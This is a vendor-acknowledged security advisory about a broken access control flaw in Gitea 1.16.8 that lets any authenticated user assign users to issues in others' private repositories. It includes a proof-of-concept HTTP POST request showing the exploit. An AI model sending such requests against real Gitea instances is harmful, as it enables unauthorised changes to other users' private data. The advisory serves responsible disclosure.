usd-2022-0025 | Broken Access Control in Issue Assignees

Advisory ID: usd-2022-0025
Product: Gitea
Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/284.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30

Description

Gitea allows users to assign other users to issues.
Due to improper access control, any authenticated user can assign a user to arbitrary issues.

Proof of Concept

In the request below, the issue with id 4 does not belong to the authenticated user.
The repo where this issue lives is a private repo of another user.
The user with ID 1 is the admin user, which is assign to issue 4 by an arbitrary user which should usually not have the permissions to do this.

POST /testuser/test222/issues/assignee HTTP/1.1
Host: localhost:3000
Content-Length: 105
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Origin: [http://localhost:3000]()
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close



_csrf=fG[REDACTED]&action=&issue_ids=4&id=1

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.

References

• https://cwe.mitre.org/data/definitions/284.html

Timeline

• 2022-06-22: vulnerability identified by Christian Pöschl
• 2022-06-22: First contact request
• 2022-07-01: Investigation started by vendor
• 2022-07-15: Vendor confirms remediation

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.